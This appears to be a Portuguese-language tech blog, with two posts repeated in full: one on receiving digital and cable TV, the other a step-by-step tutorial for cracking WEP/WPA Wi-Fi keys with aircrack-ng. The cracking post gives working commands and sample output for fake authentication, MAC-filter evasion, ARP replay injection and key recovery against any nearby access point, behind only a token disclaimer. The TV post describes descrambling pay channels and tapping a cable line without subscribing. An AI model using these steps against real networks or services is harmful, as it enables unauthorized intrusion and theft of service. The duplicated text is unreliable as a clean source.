Captar Sinal De Tv Digital E Tv A Cabo


Muita gente vem me perguntar sobre como captar sinal de TV digital, como construir antena para TV digital, etc.
O fato é que a TV digital está em testes na cidade de São Paulo e requer um pouco mais do que simples gambiarras que eu fiz com uma lata de batata pringles.
O sinal é transmitido em UHF, e pra isso, você vai precisar de uma antena que capte sinal UHF. Além disso, precisará de um software para decodificar o sinal e converter em um streaming de vídeo e aúdio para ser visualizado e ouvido.
O modo mais fácil e barato que vi até agora para assistir e captar tv digital é comprando um aparelho chamado PEN TV USB, que é uma espécie de pendrive, porém, com o hardware necessário para captar o sinal digital. Funciona em qualquer computador que tenha porta USB 2.0.
No mercadolivre, achei duas referências:
Para assistir TV digital na sua TV, é necessário comprar o conversor. Se você tiver um notebook ou uma placa de vídeo/tv que tenha saída de vídeo, só conectar na TV e assistir.
Existem vários conversores para TV digital no mercado. O site do Submarino oferece vários, além de ter feito uma apresentação legal sobre o que é, como usar, para que serve.
Tv a cabo:
Para TV a cabo, o processo é bem diferente. Primeiro você vai precisar do sinal da TV a cabo na sua casa (ser assinante da NET, TVA, Telefônica TV, ou ter uma TV a gato). Precisa do cabo com conector coaxial na ponta, idêntico ao que é ligado no decodificador.
Depois, precisará de um placa capturadora de vídeo, para que você coloque o cabo coaxial. Feito isso, basta baixar um software chamado Dscaler (Deinlterlacer). Esse software é capaz de sintonizar canais e de decodificar os canais que ficam com sinal embaralhado.
DScaler é open source e free software e pode ser baixado no endereço http://deinterlace.sourceforge.net/ .
Uma dica legal: Os assinantes que Vírtua que não possuem TV a Cabo contratada, podem usar um conector “T” para dividir o sinal do Vírtua e de quebra, podem assistir vários canais da NET que ficam abertos.

Wireless – Como Quebrar Senhas De Redes WEP E WPA


Hoje acordei com vontade de pesquisar sobre segurança em redes wireless e me surpreendi com os resultados! :>
POST ATUALIZADO:Alguns usuários relataram que alguns roteadores novos não estão possibilitando quebrar a senha WEP nem WPA. É importante lembrar que o sinal da sua placa wireless tem que estar forte. Aqui no blog, coloquei um post de como fazer uma antena wireless usando lata de batata pringles ou lata de óleo, também chamada de Cantenna. No site da aircrack também há alguns updates do software e de drivers.
Há pelo menos uns quatro ou cinco softwares bons para quebrar segurança em redes que utilizam WEP ou WPA e o ataque, apesar de usar força bruta e um pouco de matemática, realmente funciona.
O intuito aqui não é estimular o ataque às redes disponíveis e sim mostrar um pouco da fragilidade de segurança.
Vamos aos fatos, ou melhor, aos artefatos :)
Objetivos:
=========

– Pesquisar o modo que os pacotes são transmitidos pela rede sem fio;
– Localizar uma forma de captar os pacotes através de um sniffer;
– Quebrar a senha WEP / WPA;
Minha pesquisa baseou-se inicialmente no modo em que os pacotes são enviados pela rede sem fio e de uma possível forma de captar os pacotes. A partir desse princípio, localizar uma forma de quebrar a criptografia do WEP e do WPA.
A brincadeira consiste em deixar seu adaptador de rede sem fio no modo de monitoramento, para que seja capaz de ler os pacotes que estão “voando” e injetar de volta no AccessPoint gerando tráfego suficiente para a quebra da chave.
O princípio é o mesmo usado no modo de capturamento de pacotes das redes que utilizam hub ou os antigos cabos coaxiais: Quem estiver “conectado” pode checar se aquela informação realmente lhe pertence. Se temos um adaptador wireless que esteja ao alcance do AccessPoint(AP), podemos verificar os pacotes.
Nota 1:
Você pode ler meu outro post que fala sobre a criação de uma Cantena ou Cantenna, usando uma lata de batata pringles, amplificando seu sinal. Para quem não acredita, realmente funciona.
Nota 2:
Para poder executar os passos aqui citados, sua placa de rede PRECISA TER SUPORTE AO MODO DE MONITORAMENTO E INJEÇÃO DE PACOTES!
Nota 3:
Se você tiver que comprar uma placa de rede Wireless, aproveite para achar uma que tenha conector para acoplar antena externa.
Utilitários:
============

– Notebook rodando Mandriva Linux 2008 (ou qualquer outra distribuição linux) dentro de uma Virtual Machine [abaixo explico os motivos]
– Aircrack-ng, aireplay, airodump-ng [ http://www.aircrack-ng.org/ ]
– Adaptador Wireless USB GWL-G122 Revisão C [ Ver compatibilidade no site do Aircrack ]
Por que usar linux ?
Simples: O número de placas que possuem suporte ao modo de monitoramento e ao modo de injeção de pacotes é muito maior que no Windows. A maioria dos fabricantes desenvolve drivers que possuem este modo desabilitado para justamente evitar este tipo de “ataque”.
Por que usar uma Virtual Machine ?
Gosto de simplicidade: Meu notebook está com Windows e o trabalho para reparticionar o HD e instalar o linux no modo DualBoot não compensa. É mais simples aproveitar os benefícios da emulação de outro sistema operacional.
Não está no escopo desse post os detalhes da instalação do Linux, mas se você tiver o VMWare (software responsável por emular SO’s), no próprio site do Aircrack já tem uma prontinha pra usar :)
Quebrando as senhas:
===================
WEP
Mais fácil de quebrar, pois o ataque apesar de usar força bruta, utiliza estatística e pedaços da chave enviado nos pacotes para acelerar a quebra.
Quanto mais IV’s capturados pelo Aircrack, maior a chance de quebra. IV é um pacote capturado que pode ser usado para recuperar um pedaço de chave.
Uma dica importante é não ficar esperando a rede enviar IV’s para você e sim você tentar aumentar o número de capturas com ataques ARP, chopchop e fragmentação.
Todos os comandos deverão ser rodados em um terminal, logado como root:
1 – Rode o comando abaixo para validar os AccessPoints ativos:
aircrack-ng interface_rede
Localize AccessPoint desejado e pare o comando com ctrl+c. Vamos filtrar a execução para garantir maior número de pacotes coletados, já que o scan é feito por canais de 1 a 12.
2 – Filtre a rede desejada por canal / bssid e deixe ele parado rodando.
aircrack-ng -c canal –bssid 00:00:00:00 -w arquivo_saida interface_rede
Onde:
canal = Canal mostrado pelo comando 1
00:00:00:00 = Mac Address do AccessPoint escolhido para o ataque mostrado no comando 1
arquivo_saida = Nome do arquivo que o aplicativo irá salvar e que será usado para capturar a senha
interface_rede = Interface wireless usada (wifi0, rausb0, etc)
Note que há colunas mostrando Beacons e IVs.
Podemos considerar Beacons como lixo para o nosso ataque e IVs para os pacotes que realmente interessam.
Consegui quebrar WEP com 5.000 IVs mas um número bom, gira em torno dos 80.000.
3 – Abra um novo terminal para tentarmos uma autenticação FAKE
aireplay-ng -1 0 -e nome -a bssid -h mac_sua_placa_rede interface_rede
Onde:
nome = ESSID da rede, ou melhor, o nome do AccessPoint que mostra pra você no comando 1
bssid = BSSID da rede (mac address do AP)
mac_sua_placa_rede = Mac Address da sua placa de rede
interface de rede = interface da rede wifi
Comando exemplo:
aireplay-ng -1 0 -e RedeWireless -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 rausb0
Se o comando funcionar, você verá um resultado assim:
18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful :-)
18:22:42 Sending keep-alive packet
18:22:52 Sending keep-alive packet
Mantenha esse terminal aberto para manter a associação falsa.
Nota: Alguns AccessPoints possuem filtro por MAC Address. Caso a associação não funcione, utilize o tcpdump para achar um MAC que esteja liberado e troque o MAC da sua placa com o MacChanger.
Um exemplo de execução de tcpdump seria:
tcpdump -n -e -s0 -vvv -i interface_rede
4 – Execução dos ataques
4.1 – Abra um novo terminal e execute o aireplay para tentar gerar replicação de pacote ARP
aireplay-ng -3 -b bssid -h mac_sua_placa interface_rede
Onde:
-3 = é o tipo de ataque ARP
bssid = Mac do AccessPoint
mac_sua_placa = Mac Address da sua placa de rede
interface_rede = Interface da rede wifi
Deixe o terminal parado por alguns minutos. Esse comando precisa de alguns pacotes ARP na rede para gerar o tráfego. Um usuário conectado com cabo no AP é suficiente para o ataque funcionar.
Exemplo de um comando que está executando com sucesso:
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets…
Se funcionar, você verá o número de IVs crescer absurdamente. Pare os comandos quando estiver com +- 80.000 IVs e pule para o passo 5.
5 – Descubra a chave
aircrack-ng -b bssid arquivo*.cap
Onde:
bssid = Mac do AccessPoint que está ativo capturando pacotes
arquivo*.cap = Prefixo do arquivo colocado no comando 1
Se tudo der certo, aparecerá no meio da tela:
KEY FOUND! [ 12:34:56:78:90 ]
Decrypted correctly: 100%
Você nunca achará a chave original e sempre a chave em hexa. Remova os dois pontos “:” e tente conectar na rede. Bingo!!
6 – Se algo saiu errado..
Essa é a maneira mais fácil de conseguir a quebra. Há uma infinidade de jeitos de tentar gerar tráfego e IVs. Aqui vão alguns links que ajudarão a entender mais sobre os ataques:

Captar Sinal De Tv Digital E Tv A Cabo


Muita gente vem me perguntar sobre como captar sinal de TV digital, como construir antena para TV digital, etc.
O fato é que a TV digital está em testes na cidade de São Paulo e requer um pouco mais do que simples gambiarras que eu fiz com uma lata de batata pringles.
O sinal é transmitido em UHF, e pra isso, você vai precisar de uma antena que capte sinal UHF. Além disso, precisará de um software para decodificar o sinal e converter em um streaming de vídeo e aúdio para ser visualizado e ouvido.
O modo mais fácil e barato que vi até agora para assistir e captar tv digital é comprando um aparelho chamado PEN TV USB, que é uma espécie de pendrive, porém, com o hardware necessário para captar o sinal digital. Funciona em qualquer computador que tenha porta USB 2.0.
No mercadolivre, achei duas referências:
Para assistir TV digital na sua TV, é necessário comprar o conversor. Se você tiver um notebook ou uma placa de vídeo/tv que tenha saída de vídeo, só conectar na TV e assistir.
Existem vários conversores para TV digital no mercado. O site do Submarino oferece vários, além de ter feito uma apresentação legal sobre o que é, como usar, para que serve.
Tv a cabo:
Para TV a cabo, o processo é bem diferente. Primeiro você vai precisar do sinal da TV a cabo na sua casa (ser assinante da NET, TVA, Telefônica TV, ou ter uma TV a gato). Precisa do cabo com conector coaxial na ponta, idêntico ao que é ligado no decodificador.
Depois, precisará de um placa capturadora de vídeo, para que você coloque o cabo coaxial. Feito isso, basta baixar um software chamado Dscaler (Deinlterlacer). Esse software é capaz de sintonizar canais e de decodificar os canais que ficam com sinal embaralhado.
DScaler é open source e free software e pode ser baixado no endereço http://deinterlace.sourceforge.net/ .
Uma dica legal: Os assinantes que Vírtua que não possuem TV a Cabo contratada, podem usar um conector “T” para dividir o sinal do Vírtua e de quebra, podem assistir vários canais da NET que ficam abertos.

Wireless – Como Quebrar Senhas De Redes WEP E WPA


Hoje acordei com vontade de pesquisar sobre segurança em redes wireless e me surpreendi com os resultados! :>
POST ATUALIZADO:Alguns usuários relataram que alguns roteadores novos não estão possibilitando quebrar a senha WEP nem WPA. É importante lembrar que o sinal da sua placa wireless tem que estar forte. Aqui no blog, coloquei um post de como fazer uma antena wireless usando lata de batata pringles ou lata de óleo, também chamada de Cantenna. No site da aircrack também há alguns updates do software e de drivers.
Há pelo menos uns quatro ou cinco softwares bons para quebrar segurança em redes que utilizam WEP ou WPA e o ataque, apesar de usar força bruta e um pouco de matemática, realmente funciona.
O intuito aqui não é estimular o ataque às redes disponíveis e sim mostrar um pouco da fragilidade de segurança.
Vamos aos fatos, ou melhor, aos artefatos :)
Objetivos:
=========

– Pesquisar o modo que os pacotes são transmitidos pela rede sem fio;
– Localizar uma forma de captar os pacotes através de um sniffer;
– Quebrar a senha WEP / WPA;
Minha pesquisa baseou-se inicialmente no modo em que os pacotes são enviados pela rede sem fio e de uma possível forma de captar os pacotes. A partir desse princípio, localizar uma forma de quebrar a criptografia do WEP e do WPA.
A brincadeira consiste em deixar seu adaptador de rede sem fio no modo de monitoramento, para que seja capaz de ler os pacotes que estão “voando” e injetar de volta no AccessPoint gerando tráfego suficiente para a quebra da chave.
O princípio é o mesmo usado no modo de capturamento de pacotes das redes que utilizam hub ou os antigos cabos coaxiais: Quem estiver “conectado” pode checar se aquela informação realmente lhe pertence. Se temos um adaptador wireless que esteja ao alcance do AccessPoint(AP), podemos verificar os pacotes.
Nota 1:
Você pode ler meu outro post que fala sobre a criação de uma Cantena ou Cantenna, usando uma lata de batata pringles, amplificando seu sinal. Para quem não acredita, realmente funciona.
Nota 2:
Para poder executar os passos aqui citados, sua placa de rede PRECISA TER SUPORTE AO MODO DE MONITORAMENTO E INJEÇÃO DE PACOTES!
Nota 3:
Se você tiver que comprar uma placa de rede Wireless, aproveite para achar uma que tenha conector para acoplar antena externa.
Utilitários:
============

– Notebook rodando Mandriva Linux 2008 (ou qualquer outra distribuição linux) dentro de uma Virtual Machine [abaixo explico os motivos]
– Aircrack-ng, aireplay, airodump-ng [ http://www.aircrack-ng.org/ ]
– Adaptador Wireless USB GWL-G122 Revisão C [ Ver compatibilidade no site do Aircrack ]
Por que usar linux ?
Simples: O número de placas que possuem suporte ao modo de monitoramento e ao modo de injeção de pacotes é muito maior que no Windows. A maioria dos fabricantes desenvolve drivers que possuem este modo desabilitado para justamente evitar este tipo de “ataque”.
Por que usar uma Virtual Machine ?
Gosto de simplicidade: Meu notebook está com Windows e o trabalho para reparticionar o HD e instalar o linux no modo DualBoot não compensa. É mais simples aproveitar os benefícios da emulação de outro sistema operacional.
Não está no escopo desse post os detalhes da instalação do Linux, mas se você tiver o VMWare (software responsável por emular SO’s), no próprio site do Aircrack já tem uma prontinha pra usar :)
Quebrando as senhas:
===================
WEP
Mais fácil de quebrar, pois o ataque apesar de usar força bruta, utiliza estatística e pedaços da chave enviado nos pacotes para acelerar a quebra.
Quanto mais IV’s capturados pelo Aircrack, maior a chance de quebra. IV é um pacote capturado que pode ser usado para recuperar um pedaço de chave.
Uma dica importante é não ficar esperando a rede enviar IV’s para você e sim você tentar aumentar o número de capturas com ataques ARP, chopchop e fragmentação.
Todos os comandos deverão ser rodados em um terminal, logado como root:
1 – Rode o comando abaixo para validar os AccessPoints ativos:
aircrack-ng interface_rede
Localize AccessPoint desejado e pare o comando com ctrl+c. Vamos filtrar a execução para garantir maior número de pacotes coletados, já que o scan é feito por canais de 1 a 12.
2 – Filtre a rede desejada por canal / bssid e deixe ele parado rodando.
aircrack-ng -c canal –bssid 00:00:00:00 -w arquivo_saida interface_rede
Onde:
canal = Canal mostrado pelo comando 1
00:00:00:00 = Mac Address do AccessPoint escolhido para o ataque mostrado no comando 1
arquivo_saida = Nome do arquivo que o aplicativo irá salvar e que será usado para capturar a senha
interface_rede = Interface wireless usada (wifi0, rausb0, etc)
Note que há colunas mostrando Beacons e IVs.
Podemos considerar Beacons como lixo para o nosso ataque e IVs para os pacotes que realmente interessam.
Consegui quebrar WEP com 5.000 IVs mas um número bom, gira em torno dos 80.000.
3 – Abra um novo terminal para tentarmos uma autenticação FAKE
aireplay-ng -1 0 -e nome -a bssid -h mac_sua_placa_rede interface_rede
Onde:
nome = ESSID da rede, ou melhor, o nome do AccessPoint que mostra pra você no comando 1
bssid = BSSID da rede (mac address do AP)
mac_sua_placa_rede = Mac Address da sua placa de rede
interface de rede = interface da rede wifi
Comando exemplo:
aireplay-ng -1 0 -e RedeWireless -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 rausb0
Se o comando funcionar, você verá um resultado assim:
18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful :-)
18:22:42 Sending keep-alive packet
18:22:52 Sending keep-alive packet
Mantenha esse terminal aberto para manter a associação falsa.
Nota: Alguns AccessPoints possuem filtro por MAC Address. Caso a associação não funcione, utilize o tcpdump para achar um MAC que esteja liberado e troque o MAC da sua placa com o MacChanger.
Um exemplo de execução de tcpdump seria:
tcpdump -n -e -s0 -vvv -i interface_rede
4 – Execução dos ataques
4.1 – Abra um novo terminal e execute o aireplay para tentar gerar replicação de pacote ARP
aireplay-ng -3 -b bssid -h mac_sua_placa interface_rede
Onde:
-3 = é o tipo de ataque ARP
bssid = Mac do AccessPoint
mac_sua_placa = Mac Address da sua placa de rede
interface_rede = Interface da rede wifi
Deixe o terminal parado por alguns minutos. Esse comando precisa de alguns pacotes ARP na rede para gerar o tráfego. Um usuário conectado com cabo no AP é suficiente para o ataque funcionar.
Exemplo de um comando que está executando com sucesso:
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets…
Se funcionar, você verá o número de IVs crescer absurdamente. Pare os comandos quando estiver com +- 80.000 IVs e pule para o passo 5.
5 – Descubra a chave
aircrack-ng -b bssid arquivo*.cap
Onde:
bssid = Mac do AccessPoint que está ativo capturando pacotes
arquivo*.cap = Prefixo do arquivo colocado no comando 1
Se tudo der certo, aparecerá no meio da tela:
KEY FOUND! [ 12:34:56:78:90 ]
Decrypted correctly: 100%
Você nunca achará a chave original e sempre a chave em hexa. Remova os dois pontos “:” e tente conectar na rede. Bingo!!
6 – Se algo saiu errado..
Essa é a maneira mais fácil de conseguir a quebra. Há uma infinidade de jeitos de tentar gerar tráfego e IVs. Aqui vão alguns links que ajudarão a entender mais sobre os ataques: